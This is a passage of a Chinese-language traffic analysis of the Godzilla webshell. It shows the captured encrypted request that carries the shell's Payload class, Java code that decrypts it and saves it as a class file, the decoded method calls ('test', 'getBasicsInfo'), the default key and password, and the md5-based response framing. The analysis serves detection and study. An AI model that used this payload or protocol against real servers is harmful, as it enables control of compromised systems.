42kZzcsUtMgsCfQVFSNPEDk7XZAFVmpMvO%2FIf7fdxMVvEm3YZV8oX51%2FOy3uh2OzsvJhFxxr8uImbC184cyd8UBcCtRKyJe85uF0z2Q40v4Fo8jITNxRSfcWY2wlffp76aYcJiBTYCYPPWDqeHX8dOY%2BuodEPxOcCCw77ZFC1bK9Rl%2Br%2FwXfB17HYOoTHFCS0kweh0HFX8978huZE4BpeM6%2FzbG0%2FU45%2BQZ%2Bjdb%2Fc8ZAV0w0%2BbtlxHVC3Tk%2BvjHxlAf6Z9vuIdF3I02IVhT%2BAvJtF1Gqk6jl99GpA%2BtGJ80TvnoJTLdTCePg9uoLZptGUBZS2opm5hVfMPAQT3%2F0oR7nE7Flk%2FFVWoE%2BdpP4kteWJKc3jdgCIlzYL%2Bpiv2IfiRB21dtX9dfl13jiUyeC45jvuA9fhhFp2ujdzMDNiH%2FchefpURi6pgPXm%2BQiUDA6yEBFw0jciJDD5D9TrcRHxwoCLviK%2FzoiaC1sBu%2Bi0rjCsmxZCF2fp9h2YsATw0Pez4%2FYJihpNfiEtFe4ziObT%2FLX6tAoKQszRF6myw9%2FXkBqxr%2B6tQawIDQmPFy3bHR6KLqCj%2B790FykqAmqBNfdGSbha3%2FLUH2IUqNv80fWLHOez1Qa%2BLaAwKzkaaTBiQDJ%2Bg4evIE3r1YRjzUtnq9hYFP5JRpuXUG6LIEN29xPNj8wZcC0Wz3oy5kgmwiQqbTpwIw1UgzeXSB5xzy2iFCzLBbuI5ru1HnzebBRVWA4HJfbZy1d172bbP0EhGu%2FihjMDHlMT2oIbxTJt4XRKhoG6Jy9vg0v6pEyn3enzh4IL5HX7S5NXKrb%2Bb5EiUNhygX4gI2N5uP8CCm%2BpO4XCPKo4Dic6xDYbZrOLE5Z9I01mplnMH8LRjQHa03mIrJldDQL23M3%2F9hxo%2FTziPbBTSB12RUMYTJZ0WjlYPvzNWVp7VMwXtDvxHgmxHrN%2FxceqeU6Mrg%2BZftYoqTpn93QJgWiB4z6iosXqOU7gWqlgsjgwqNYOVzIGmEubkBuj7yJ%2Fq%2Bva%2FZxFK2MuM9FFoPu3m3ef9kd4q8F8bNUpdvM%2BGFYljNMDojPsbiioam5H5f6oB2vdCtO7WgqH5h3FRIgNsM9JQ2Ot0a3cCdCK8CMXtcAGwSNNwvcI0gygWRO%2FcU7wC%2B0YTamsoeSBocM14jfFENJksZqeV7wMkFBWNlWLCFJmXG0jGfLGEVWsqWLvFZ5RqIXD%2BZHEMelNK4DUGyomXOJAlfVOQpRewAiecH1QTYtWKxqSTHZcFxGolYW2T1W4jA9G3IKG%2BeXKGDKS%2F%2BxhRWV3ucoxf%2BiG%2Fu64OtKjlXgLK5L4%2BAG1nCaMNGvepucS1cm1F16JYFBMJ270ljcZFaA5dNgo60v7eaHnnuqCmNDBMuRMNJEE0qdk95bS0%2Fwrvbj68KkCNBfboriai4Xjgvr1Ux2glAzwbyC88r1QTYtWKxqSTHZcFxGolYW%2BAlvdV1BNgCTMgwtl2MATth%2BSWCF8PO9AuzV0fjO6fYf9LojEVoMNsmJxxbor42suwWyEDx1FmCs0d1yOGRzn%2Fevox1Lri3PMBmroJftmowRgFT0xm4lduuTwwMHSp9aSTtcSLvv6E2CcvNWgTZ0VFDCjr6cIakhEJJ%2B0f58QxxpU9SKVtGedmk%2BsfK2hqKkVaRshnsZL08vzb6Xx1cjcHbxHztOc4QFGJyCsRlqki1dUWqGGXIcg%2FZVDbOLrqlTSTtcSLvv6E2CcvNWgTZ0VIsaTWcLg6hLcItJ9IR9GrppU9SKVtGedmk%2BsfK2hqKkVaRshnsZL08vzb6Xx1cjcHbxHztOc4QFGJyCsRlqki1n5Nh6uE78SAd4Xmmnha44tzNmcQLt%2BkNhfDh8JB1iiag7Fg01zIyq5q1bcBI3uWjOw%2B0eJ4G%2BOvOpyDXjOYmX3yesHP4hV%2Ba4kcLBb6vrc5Dg7xYJDuTqbh8SxAv0fEcVPar%2FqwO8I8Nfm%2FN0f%2Be%2B68v0y5glgkzMwJHJNyQHUuwhjt%2BEWadiqmNbVCfl3vIgUY6M47tQeVXhc5ezUWz88XXWTndq9E4oRUuX5iC3yjzW4d%2FUVJZKll07o%2FWhR9ECON5XT0B8d07cA6ZMJmm23q8%2BUZE%2BW%2BZ14OqtH8bhGnhIpwfzHxBbA%2BDZaro%2Fz2wAVNy6ythO47mM9x%2BoiiBgPCedXu7UReqXzj6WN7107bS3TIk31K5LKsZK6olHqIr5i6dJ%2FFT8gkWzAuv5Rjo2V3VKGwjoUko%2FQC98IleuxGrm0%2FZso7bGz1LNdw%2B62F7evz093UtRWVQvF7%2FZZG%2FRKhQRBkAmzes3yCKw64wEECY%2BbDey9xceWAfR8a4J10a18r80y%2BLqKOurEHw2Ty4QK2DmqJ9sSgegR%2F1RCDMlyq%2FRDYqHOcFWIBkUshaNX%2FsXLWQURBqGc5QDY4Hg7akJTsbf7O8U83Ya0DFgHyCfWjNuvnv7%2FkXN%2BlXmSPb6lH5yEfURrM5q4LulyfnJwyuS7%2FNeFvXU3Isndyy5%2BeCVR2L%2Bowi2pq88%2Fh%2F0nFDCCRQkW%2BDuAGHILyit2YrwL1dcqCGaiCngcMWddTfOi7gVrfVKvyisHYR8gO0x2YNsndY5aEARSLWVVALObIIP%2FErYjWzhY7182G1Xv5baA0uqGhyAmV1q%2FH4i52j8EYTZ56ovZhyc4TQwwoFrlubDa9iAVblryj4Vyepec4xjE94l4Af1s4abwafHC6YTIs6fCg%2Bv4NVeH5ew3YlyptgOy3D4oZfZpbv7S%2FNW4bkyQoILy2odL73cM1jH5%2B%2Bpz%2BDZ3aF0PKGlPhEIZ1BJ10N0kBcbQcXEwzUa105OnyfVtPcaR%2B7mFzR6VUUFFRFVGi5zGzXFmU1FF%2BGFBvVv5y6ei50Fya9FaDQIRizg4EkRf5VzA1GRiBMs6IauxJk3M%2FX31hcLxCYe2Q3DfEd%2Fj8Kf95zVnWjW4eqy%2FK%2F3HV0IqgAjo22abGPhSYOs6j5H33zo%2BZFgpY5rC%2Fykfzt4u6zXIvlfWybESoyliVw9tAUg%2Fj7E6L8eARIhJ7aRIqik73RK3yBhY7tKGGs%2FfvAlABZkf3XDw1eXYYRtPBUg10SU4zOU4i4Ise%2FSm2B6BIDsBKUt3CTe1kU6kUuIqcGJsQXhYQjEFNd3S4A1mJuH8zxUAFrgWBunLsbXxoGRlqyfwqS8353Y7okfRpHc5wqDgYgMcXS4gnLAgbwfeRKCob2aWbXDBRFTElkPzaJgpXUYSPXDLvl%2BxjExYoh4BE3iKrsNqzt7XjiBQAS4Z6%2BXu5pB%2BtudMA5m1rO9RLIIceVoMhuT4jey3oCRmb4jBxL%2Bl0WlE%2FH3djTUuqFgbavyS8jvSm7XelwHVREo6xsivE3ZWb%2FWgfZ06b0bVuoD%2FG%2BsDKdJyppEPE3XNkLOtyRoWtDf7P%2Fk0PlToHZmxvW2p7hshG5K9eLDaLt3uRrE9UDdo9BEFjavzOqN32SZP6C0m7nAM4z8VarBXqBRv8%2F017Rk5D8lHz5cZApy8m4deLkUUx5RSTpEvaJbEyar8LdEja7Zz9Kp6v6upte%2FRYnpAkwsJH3D1UiX9BpIa358SP9BUQ1gEXWmJ4elo7Ip8UKs2yy6zDcUAkGCQ%2F32lyFF3qmxPhjOn0vSsMVBgPXv%2BAnmbobKlvVBR5tNcIfWaK6e4P2rljxWc5xMxWsb6tozklpm5aD8EGciOBR8FM0Sc4%2B8hgl3unIVuXdmJAba37OH%2BDd7BgSHsPqannt3a4BcYxlrC16Q3bgW4Wznw6WuoB2XEfWj8DIGOhEnN6uQFzGcUYUvyeABrFqy1Oxqc8pqIVy2fq7yF%2ByEsODEQ6a3N7IXQR4On5KrXLQw35xB%2BOX74A5V2eIu0uNRcW2v233hgmqwS%2FNOiq9sQ6xOZgzL1ZH4wkn6CQfZ7ocXeiM9Xnfxa3Wa4SHd14I3LbD8DGIQKai%2FynWHO2BHOkt28zVeTfCtu60pSeNvGYdj%2FbVcuZQ7HWRS7zyxrjex7ia2luSXbQAmJLuezHUE6uKj2d5ya9CY6lkvYwGglmpt9jeX7MKv5qF4%2Fcn6QAwc5eGk5uGEP%2FCzhVPmR7RBp3g4H6v2t1TVElGZ9OHrcCrRvx1T1VLmsIEl%2B6V44fHLokD7bFikVpy2XZaVNAZoWca6J7kFhFKDEcqHHVRyIPlknWBNV3zPTQ9EQ5FczTJhmMa6x1u7ZkC34kK0rtu858RGooTFzjFOdBqo6iqf29e4Xn7grLviiECsZKw0DES8saz1VtbHWAALP%2FuQ%2FITec6EsEYTv68lG0OZnz6vhjwC325pXiD0ERpg7Vl5VKYylKTsJmbbGp9o%2FboXosTza1GFnIs3GQn6B8EUDjTcqv%2BkaLsZNvEZ5sYJyN5bf%2FqbR43YqE3T9fz0Tn8NKQGO24Fk50gzPmQ0ZDR2H%2FBO3RJ%2BQbItjMO1lUbiNrB%2FmylQNb1%2Bx0omkr6nVPxGMuXJoxgbdwcTtpVwP1n7hKvSm4HzVeDuvLBsSDt%2BZlwx%2BTyNQDHeikhJZqPUJ3GsprcNQ9mJka5LHS8hU4cAGdPbQAVWX3g5wAnN47F0gMFM8I49bX2ROkqSYco%2B%2BegsmyM%2By2li%2FsqxL%2FgOle66iGtWZ7n%2FWuNlJ9yy7egptgKY%2BRe4DwvWjs%2FI5p5hf5RcxqBGtWsVA%2FEsDWLKEY7pEdB8DNuf9gLkbgjnR8USKKy9oNWiL8PlT0Zf%2BG66KNOCMwe%2BE9mf2hkRGP2mzP1YlLvXOoowGEbauKVghs1GVl375o6FvpCXHezaJvkeVx1TyZ2kxfpoZFq%2FuZrj86UptVKh4WKcCv%2BJ61SPSByooq9g1fiAt3mer%2BPomsKWUL4plwUoB5jBwnkwZOTh5WIlRz6mUpoRE8I%2FCkrIR2zA9nbl4uu6TF0AlWrv0eGDoJHl%2F66pFek9vrVwdSLjViWd265t08vTwQrwA6n9%2BEmD1%2FLGxbwe1%2Bl5Kd%2BpyZ95QBpvQGl4fMO4O%2Bgb2Lv4Ujb4n7juFDrZUZL9AcOjZLRYTJyrtetYJntijlLSIUlZMwxAZnM68jA1dcCnPddRpv17JCVq5Og5DSTxUv8EI3JXkUfhUsXAjzf7J%2B2Rvfg0O%2BUzdnwTM1R8OrhIUU7cgy7GCXOnAo5UAo9rFk2sUEo34mY55tYbJX3TvZdKvoafIIRlvvv%2F3MWnTjwSb3TlaDAFDPmSoGOIsP4vA%2BV1s6%2Bb%2BzvYb6ZfzC8M%2BzHOJwyjcIRAWKdgJ18hk4Jt2QIJHCI7NdTELznda%2FDCEDu16qDV7tvIbM2AZwVDqztFHj7FkEzbQRILuN9P5Nunc45HMAIlaof3CnPdcMoWQxUmcZWN5J7KqatE8nld6ZRkCMBKBUjPldwWR9RD8gGOb27smyJZ8DE72FPC6nUkBRkf0hM4bkvpAXBUsjpyKOWEVciyzJYVsa1%2FIV3qk4oKhwu70uKm6vfNeEAtTiNos6NcFLk8XNxoCVidJN9qoaKC3nrde6H%2BJefd3o43NhJBssgtI9YplBmqh06LbcmkNe9HY4hn%2F0qy7JeUokGLVIyTDPRgEDZImJbOje0G8nq2rKoYbnVECZ8LKRS0%2F4FdqWIJtiCFzumfLjiye2QCsYBlGZdETCSysH1%2FYYCsxtkacdD8%2Bei0p0B9giGGsmp32XpmxG2OOkc5XWX2DftafigobuOgHvqAhzxMe%2FmXs93B0%2FIkz1I%2BIKLVfXYuFCGIbTzDhVYhXwfty4heYU7rQXMT6O8d4lbrTWB4NbNwPA%2Bcp%2BMqcMRs5GUbuqc%2F6lndu3NIPpGmWme%2BJka2OXOuR2tn8oEVvqRuKrVr%2BqZ89z2C7aZEHfVsMf57vysgGhRxC6ELRyGFBQHRF%2FS780jTJRnXlcKjApFeE5JVtDPNI1hfcVkbrbrAz7mrECMNH%2Bwn5CoFM3%2FckVffwmYNNHOkdkMQBfXBfwc71V3mLDYYzvMKPtNKqJ7NZHpMTwBuqWNshb61L0NDKq2XaaTsdO37OcdccMMK00ELgMCV0vUTxW23q3Jwv2QdeKf%2Bg5WyJdHep%2FEbteS3ZhSmLPu5oIWVUPxfyY4xcxL9bL7ZovO1tQBtbDQ5sCDhCZiwYii%2BUCLhuttJIuH0z33JlUA7pJmb8VhFyYHIsSLbM72LtEeVkgRFmz6DJ3OSVXtsJNP0W0uzn6UtNFSsNvkKjGbVfDvnpOipInmz6mVLKrH0LAIIJYQTdB24Bke3iUPsE7ANbE17xF0yVJhFCUNywtqnuqM60DuKYuqDCuPaJTB3yP7eggtW9LCDptnodkw4r3uWA1Sg55SIJ5KkjURIRHzZnginJPElxeRoszL6oZvU1GhY%2BbjrZsndv%2FH%2FrqjWX8GJF55kHf9Ol%2BRMBFiWahWR%2FgKkhNnmvDG6f%2BVjL6yFMbjOLSYx%2FqSOTrfvj4NVPxS28uSAO1RjxNyff9AQmsVPhYvmMhmSYLurHUfPhLvr258qA%2Favh%2B0wuEmjfOBOkWGsVcz0RlSibYo8OnwfN5jn2qi7eVjXMmxLcxmMcWJJtix77NDLSLjRkSw%2B9XX%2BEbSyQb5RyvFhcTF%2FOIRmQF5%2BVTPMHnbdY%2F75y4h6k5qfyfuNuYLUeckTyBOCxmOuYVzlbzLfTKXZT0LcqGqQtbosD7pUEtSrwQNjlo65LKlJxl2v0aqJM%2Bfk0gkMzWJ1MakNB5xIIjrqCa39NNLth1sRejy3JaITlAlu7Gj759SyPKxsWU05P7fAK6%2FC5oyj5cLdAmz8okawIrV%2FME2zX3KQcM7L814sAz2Q3rUs9Ft2jZk9EadY1GKGxepWCYapqepcgi2LcAAcuhNCOlUa1rcAnmyvpNVThQkEAfVmVzUikMfQuBe%2BSW%2BltQUiwxjN4sFlwLynz4nx6W2f9jtRRUxV2KFpkNrlvCNC8z85IrooT4PyzWeJ0ebgdQH6dDJnnxJg8ocGuTayGSRR5khcyncLO8xPmcGkZfSfbkmK0Th0bIp3abGmoeAwNYTNbGuxi11gCDnkETw%2BYX7wFLXLEKCkW3WS1vyYXUsoh4I5x0RiMnmbVrZEx1HZSVdy%2Fb7wzHyqUEHAUFzHPUM%2F7z4CZ%2BUSX8dHwezdlJR1IMWzb2P%2BGaJfwRPUtRekRo7QqsXTMR2sUurVOkwFN9SPKJmGFEMfJWw995fMnNFiFKbiSDG9Wax0wni7UcS2Qw64KkfIovRrvUbJCEioeqElZlnwNP%2Bj4ppcFUMsYNHa4pcgI7SXI6BpWFAyGfvveqJ%2FbYfVw48uzK3FrNAUVs2qwPqxcWWRcmqa%2Bjeo9pu5n7RvChEynlixhFD%2BPOqenIFhw0AWyB6ZYXiX5flN0NZx1zCITaU7UtjnZZrKExnVAnHn1FjVxRU8qitTBtiw3RjHShfG%2B5Pm8mtwDs%2BMmrsiHYN0r71Ijsq5c%2BpC2JDpuMGfW1n2JKgzwiv%2FB9mpkvl3XCfjSE8MEVSA6yD7WYG2rSHfpe5kVRqwQuSlNrVrXEsi9c6jD7J9ek8B33vFw09CS2OvAcdCNojzcMwv5AwaHxnS54QPb5AKgvGP%2FPVxoAN4SZOa487AmcDxhyAEqvdavrp4z%2FiXMBzXosgsAQtTafdz11AFQVs%2BO53M3igZxCxsQYmlB%2B1F4F5BPkxwKHnHlzf3CzZ5oUvhzZZkBsVEm8S0mIvMkXuAsH0kdIXxJ2V36H8ffTD0H5BceBabWb5m8yx4p9Zhh1tWjm8jpxj0oAjeLj9Fvie4PPqxd7Sy%2BHAKaudSz0dBABJ4xk%2BJclINhb8C1qTR17FlkH0TEpUYSvhul%2BC%2BQoeFe6BVfOy5nqFWpWoCNA9DiSzqWkns70RDSNWR4vI3AtXCfs9CsPL05OssVbUIGer0mGyhNcHS13uLRLzI%3DHTTP
将pass后的值赋值给变量pass1,通过base64解密和AES解密后可以看到这确实是Payload类的源码
byte[] data=base64Decode(URLDecoder.decode(pass1, "UTF-8" ));
data=x(data, false);
String filePath="/Users/dxy/Downloads/POC_Test/src/main/java/CCTest/Gozlia.class";
Files.write(Paths.get(filePath), data, StandardOpenOption.CREATE);
第二次请求
pass=YEnj8u4cQ6nrblbzSPp88UgInFefcTYegl319BC2HaU%3D
依旧通过base64和AES解密
String pass2="YEnj8u4cQ6nrblbzSPp88UgInFefcTYegl319BC2HaU%3D";
byte[] data=base64Decode(URLDecoder.decode(pass2, "UTF-8" ));
data=x(data, false);
String parameter=new String(data,"UTF-8");
得到的结果如下
methodName=dGVzdA==
如果对值进行base64解密这个结果其实是:methodName=test
在请求结束后有一行打印
11CD6A8758984163NzaU6N3CjHqGaLefw10LgQ==6C37AC826A2A04BC
根据JSP源码,response打印md5的前16位
String xc="3c6e0b8a9c15224a"; // 密钥默认为"key"
String pass="pass"; //默认密码
String md5=md5(pass+xc); // 11cd6a87589841636c37ac826a2a04bc
所以md5的前16位为11cd6a8758984163,后16位6c37ac826a2a04bc,中间NzaU6N3CjHqGaLefw10LgQ==,base64和AES解密后为ok
第三次请求
pass=BWgWba%2FcB22aiK1VixsNi4QsXeqb7GmuLOhwdts%2FoL0%3D
解密完如下,methodName为getBasicsInfo
methodName=Z2V0QmFzaWNzSW5mbw==
请求结束后的打印,同样是用md5前16位+命令执行结果+md5后16位
11CD6A8758984163fD9Y3mEN2Mhajc+J6SZtis741Qr1IY4fxA82uK7zI06zKH9Ec/QqXuIlrgzeQo2+lxSvI+sfdmNCGGeKgdrg/11df3cGjm2lsOtS27ith1UYsQg98qlxjOaZlgAPd2EgVXiFUFVT+10VnsK2ioK/URCsTJwUJiINmnLWxjw4JqJM+dvlf1/KLS2gAtL2n4Okd7q+swRqSjj2fxLmzLFKiGS0yk5RVcWs2Hs/Ol/T0UbU+uPb4bDGxJm6oHyp4M68Ha7SmJXbWPsNK7ZvlEcNue8/iAabGDl0481P5r44JgmmzCvpApgjEPYkrWc7lt42XfeOidc1BQk3N9bYoDokvxPzL+U9MFGVCO58cR7443708F4ki6qXBgcmSUk5UONJeMgXLu6h+1/OehG1Iji1BlUUVhwCrq9BiEvd3jwOIKiAa1abAkpUlFExBcV23x2LdP+M4vPVCz9g9EJ8Oy97xNQfRadR3KgWHXQwIBOHy2fIOoCE48PYyY+EXBJMYvngp6HLLG4EKgxUKFliY3r4+G75mBLHWbA9fmoKTcCuBIf55BjUnmoA7+1WYN5UcVVUB9oVtdBmBdW0mWp5meAEBhbCyuHRRE5ec77gpdMmgVRqIKP9uEsRVstbfqgGScqe7q5fQKnq5Xh3CuphVRSdejfMUuJCG3ShKqko+nNPGSX48oOzCGd5EvtAc/PkQvHlXj6MtsvHFrrcJiAGa9KmZa253RWLOKMGUqa3cUrb+kZ6IPSV+ux1rkSGAbMD8oWPlYk+5/415bL3SC0k49DGyOsnoQoC6ATBUJQ7cLt+Cuwpo42I4gI7YOyJ4+AuWuhNTyojEUFsl9yyPj3oNHFNNGm5uJwPf+28znhPY8bwwe9mHJgIOAMNhi9lt+RBjCV/wieYf/Iw2KoF7F7AECe9o8zWYFqSnbcCKLKtngASaiT5I5/9UkJzrTbYNTI6Sw/k0s85UjwiwoyCrZuDOcqR5TnhUDSjZWHrqA3isTd147XBtH1thMb7ffIqkx84p6GJzZ/Tm89KwvmM57UruCJ7zrEsN1yv1GHfL1GjEZkKF0E4ASCEDspgzzYMqvU/uSXTm5iu1p8vkknMl/n14Vf4ruW/lBxXKK+gfMSLLiC5p68SsyDqd6l/Scs9aotRP3onLvl7/F2TAvMx3y4ANQ+EazgBIIQOymDPNgyq9T+5JdObmK7Wny+SScyX+fXhV/iu5b+UHFcor6B8xIsuILmnrxKzIOp3qX9Jyz1qi1E/eic1QFrVDA1mDoHtChJaiNsIio3qECfWl8bxpm58Pkso/n7jtWjs0MDr9VWdjNp6dvZAP3O0GUWL1II1WSDtHoXJUX111LKRouwm4Hi7RmhffGMIVXypM3gbj9EqTw8EelM0HGX5lUy0lXN7P8oUCr4CvglWKEUDotFoRDeU+bQP2DzwqaRku8ngAu4poHJp6pn5olQLd/aIOOZI2GvYTGa5bN8yRqbVBxv9eTEk6h95AW3AGt6CJxgJZO89kucc+qTjygRhsUo+u2SP+lXiywmJjj5uVvCzLjo3NnHQg1EmiEnVlfwRKm9JC0A+fxN3+0v07sEAGJAsFfwDJ7hNW3wJiL82FLQKWyNpFR6BXHTGkB6tlAxHXg2f0fe+FWYcO70PvuIfPQA6IxmLeM2nXsAomEV14gZb4HxgOWRPAyLoI1knDIVs2Eu+RRfLWnrMQEWd+93RaUoS8uIC/NmNpRGRn2alEp8ID18GIgqG0wPTyMHWq9KR9S+OrUWChzg3f59Dji6n4XWWyHSw77ja2APVPTH02/e5Vwb+Dpu0FCSbNu5X+j7C3UZFsZYJU1cy+xIDp+Wgu+IIZeVPyXjtjBuDo/QeCBiN/Xt7i4oGa0lXjW4oe5k5c9QZSQVqf5RzfKPbAuKkqFDdpBIfENQGG5WhZPjuoveUtDN+HnjupK9ci22GUh4u2XbMRS9ET4PSYgd+NRO1CQBUdeg5Izol8VgbXRfo/NkEwhm8ZIQNDEpZyPhGfaXUzUt56pZGFV7P4guTsTAH9BwC8R3xfNHWcCR2rha+7E51UfGhGM2nS75BC2oD8FeOx0gj62CsYH+mWSmC61v6Vfc41OAvIvhyFepVsyBUycPdq4Qzf0pWe2wPvG75mBLHWbA9fmoKTcCuBIc2/jdV8RdyhSofAducQfrZo29dm3al5wR29DrWPSy6/DU30kLqDLT3epODY5yElIMilMyM96YYqU+6P9wllJW8t1zHtVSqLDgXOyLro2+3IDHFLCozRrvmBu3BXQoN5eIuEfk62Dq/vq+f+lnEek/jvYBnznAorJ1VzA3TzcoEcQSzSA1dWKjayRLJkeT+jQvBHfbD/854dTm3szqvigdEb9xfaCgwL8PVoT+faQ38jL7C4dvRqOiJsbi3HwdZKePtgVS1n4TKDsIIncMOBf1t4omJjOMMjOmTgFrvyWrFk7GMH1qaDiWj5PjlxeD3Q9viYplxp3jabBx4/6PE4zSX1RACsjNE1qoRJS78oi3Tk+sSp2ltRoeRRagKr+h8g3QeddFhjf/YmUX3s7FMjnnKnLcFuG2yK0NTNwx0crrqfxg/e9aEH5Qa/5s2DgYsG9QMMLGzZSBSyINMe5pFlDf0xVClqRo3jlfqxFOQ5jYxZY85LPAcUt1SUnbNe4AaUy4wVbRBGlJ4vkd+YDVWDd5z08OA99vzuP2IomR3Dqmin2Qria8Yt6Int/wKWWEbK5YObiM7cYzGG4JCVY1u8ZHAuomicjPwel9yj/pRdbH5FH45nfwk7vAIYr9H6XM62OrLlISm76Wo8wLd4rmP2uVzIkDlzXu1trzKErMxO0SsDxdjlp0RqzWnBH2940HVITjrkLgvGBWBDhrDcgOqAUZm+tITzyu16AoPitCRW0NR5wZ+lk978oyhT4JxW9IdB8rSqWv+T9CgFBqogKQ/JQQoEHHTpNUtDxuuqtupsHa9KCpD8HGhgxdzqbeLRu0fo7WaJ21uUYDdafH+3oUydBwoOX31bDtvQpfslZJJyyvi2EMe0zMUWDTiJiqDddmEgqrKuu50RhPaD84mCLy5ah2C90i5lZaYwE281tuzZt+nguRlTeRUXZ3G3nQxQf4zmbWcRsMGq+bK7inHvlGDhltGNjb5U9mrY3MlFKKHMmvJr1HQrqhZYNfQBOon0IPw1ro7Jpyp2L5JD2kpwFKxiaUu9cEZnagxsOag8CK3xjR8JW4JEUcw+7XP5vyzGDOGq8sQrbFz7ibjEO1VvlTqIYsduVnDUCfSGO/uUm8qob8nweOILVsmaSOpoM93o6cnk+qVfyIE9nM9yUPN2TqYqEnUwMo3BhNWOECVm25oSnu6bZ/m9+UZmhmuvvODOv8is5MgTiSHiwH6ckVQ7Bv1ezcY7Sn/GslrzWTFnoYsGDn557r4mcOJI9jvtf9xNRT1UQSTAYUdOIxp4fhv9a7IKzwB0kMjl/EBkmgo3fxjM3v3PCiiey7kh26ms0fKMMf8+ihMAmuPRdW6GM7ZRI9HsrMzBcim6ZzAviekrhTlgo+TIQK9RlslAiUeyts5fkVCpb/lb+NAdflbnOzXdPo6l3zA3PXW4O6MLcRv+Kafmg0G21e6xyGbmrskwtTORPL7IgodecT/LZ0p+W2xBtzM9jSAby8ezbeXnJZz+F3lWhq347bABY4lzU2jivnbJQcJ4ou1q2CuTfx9ExgQb3KohoxdIWwA90YOAjOrGTqndF5pA4RK5dvC/+bM0xwwOYg2Iv6/uRyamsrfzZDTMvlOCEpiNCrOkM/bKbvfz/2RkKIiE7BwVScnpw6IGIaZVi9DY7dd43Ss7RSwoMVme8dWVswDweU/OiXEL3+TlBl2OE7T3v2pFxLUaqWaJXMCXMH6c6ksps+9BYCgtRyrTIt3NO7iFKYsl4zk+oblc0EmIIQok7QYlJPE3LSW8cZ2haM9PJYHhwT6ALNfQaqZmBRIocaaJNpV/7BjhMvIfksRZrjJBbAJ0LkgpwOQ2YOFIFLzp8N5hGFrMNjQg3lOET9FHn6UG5GRMYfSIdDEgdS6QTJCI5uYrtafL5JJzJf59eFX+K7lv5QcVyivoHzEiy4guaevErMg6nepf0nLPWqLUT96Jxh0RCRcyP7oy+WJwydTbwowhW61R9cHUGw6eTWFTsmnDUI9MEt3HiTLs14i/8dLpCEQX+9L1qxChbE8z4LBAyo4rwkZ+Ptm/VwLZqM2CByYObLyXvwFTl745iLLSW25l39ToXOAsCdNolIHvTKmfMULVD6PPGo465Xb91czqIFj4i+wo5ZrzbtLnqnZNSkqbISWb9MgIZOrkFauS2lpNaNp+jtLgrUMJBrhNDKUvhZhglFmZ/Uan1bEp7f4jNFwCIenZy50/Ysup1LsLKJunAYde34IX95a6swt+tVqreJ4G7O10rnj+FSjp2nZEGO7acOZCDQFKQeQJksqxKZAX4vZqbDGOqsKbOGaBQDZDD4S6zwvFzH8vhmN7aiEcQInJUu2FJ8KBO/RIvG2m9mlAAwh1qPVmd6UYXPgEIqmJfnr8Qi66aE8tIk85WvgUv+2IkzvrWyV2p72GeaiFol+x4QWuYtKMGu7YKEcqByhGH/Je0HlF1HeU5UtOsclTY3XAZzDfW7Qq4UEQKIPxP726D38Enopfi7CR4hDh2HukAKqmvV+Q4Ah4E9QGfFOxzGP2myXPhihXwzT0n3T2nq+qKK3YvRgepixIwpqbPJXpZAsFSjpb8f+mLuIO9rWRZlDWJFZHZefeBk6TJE58RDZG8an/Rj8oCr8lDL7P+g7jjLRLvKVA2DN1n6Wie9f8nyCYmFMM68858bWYbdrG18+jkO/uRyamsrfzZDTMvlOCEpiNCrOkM/bKbvfz/2RkKIiE7BwVScnpw6IGIaZVi9DY7dd43Ss7RSwoMVme8dWVswDoXIis0Jor9+fGUn6ljRbOc5RXKWZhZAdQRKFE8mL4YWzpEucQVaThGbPnfjmjvd7OKvfKhLi1IY7XKO7ZLTP98aLt8sDrwtMUtS9+8b96CxgE8dv1RUq7yPlfb2Mp4YI+JZIlt5CR1YDuIcoj6KCX6/lzHIKkWSxgQe5T/VW0b2ZaJwg9/hyMEKfT08OoRg8iePA/tJmRhgJd5Ynp4KSLT0dRpgoE03muTByxtPUWh0VwsuWU6cZ3lzQB3D9IbGuNGmJoK2C6Dgsthwber+augPx+6i3ml9j8V7cYsKcdj7NPORU2XnvcSscsdOyFnvJB2msiS5VRNhtG1cewZBdDktAydhCpiMmVzD9kOd2S16ByiO4eWwGuXe2i7gP2i6pbA4LDFKgt9s/8jQ9wFx4eRtlYI8NhFTrz8G+NKmA2A1KnldtZCNZQDKhRqP00nIE080vxWDHAUSggQ/W0GKfCNxNVJpVilPzb9i2/7dNVOjAYpytBqDZ47nAArOV1mVxi2462QzOFx+Wzz+L78yywzI1BASrn5zNCdJJKZy4G0PHV8lLjIiOG8rI6LnatU02kdFZET70+JyT5nK+iy05lQ1f+cutHobgrAADCtzo713GludSVGE4h//zMo2DpJ1SxpDKI3/igHUSgQtUarseSVE53+Xfvgan+1VTCFtU718Z1jRIyRgOFqQaEHj+kARjkGV67maNs5h13B7YkYQ+pk9UiC/L+2PFnq0lfB5SVDZEwsMDdb1WlX0pO8i4TzUVO8z6rTdzSPQDfUX6mAqJZQt/LnXgOXTY2TXrotGq2NIuhQNa6KnkEMa7gZN0BKbo5EDrGC8dkYbtaUkIrtY3zi6MZWkWlIyJSBJeInOssvC0BVLdEPH5gVdS3rGRyOmSpQMz2aYvNfvRQDukkU/xI6qfNesiJX9K5C1aEgN7N8kmg7+w0jj3YHyXq+qw/7+XwOpVoJrYZx6oKkgXfP6dXkxi4XHJqf52JAL7XL2gqRzRlmKHzMQWUxWyYPnJML6xfVO1aE/E94bBsUaZZD3gd+9JY25cZ4KZfRdcGKOA8fCSb6dm6Hx2HVzVk2aH2xaVxBvVBDCQtxWXSSfcc4y2wnTcq32me6gssFVAJZ+xOloJTLwfOwsAAPGTwrh5hWKedqrDCMotsv4Jg7A5RiImvuOkFoWFnUlNTzRRxcwuYnkQno37STv01UQhxX6f/eV0zGNkKkXKMNwOZk7iRAYA3My9v5wSOraW+WAncC0Bui6Bu2+fjh/YBLXXnsR5JneYhBZS1nWzPFBDlOe2qxYiSf4JQ3oZ00QrYCqOtHRC8e5czgvqL405N7kz3AuQ+9HAo9CgjC6S8cxQ2r9PK/AHB6tfn8UzQU7wEJMFQYoOe2+TKbr3XAFvWBsGX5LOanUxPwMP/EhsY+36hFgxH23kxIwNt4150DMuTSngCUg126+gcKtDtfBMxrvSpD7xSOuA0OZ8jbsPPSUg2cb/DId6EFaxwONFeRWrCf4vSMuRfrx4V6VX4x3RP/UCUtsqTAa+BjLaPKsyZcgrc8PiNKFRK9KJReL7osBN0YgziGMBgEfyAlsDf6Kx9YU2g7mV4fBPMKwjwiLbWG85mScLmxOo3GEWKNpMjtXsyq6h92ubYHFZBHnltxe5/VjtVX+jD7zgCS5EPg8N37TEFUOVpJkTXqE5sW1CBIM1rLwyNOJFs6lF1PjAo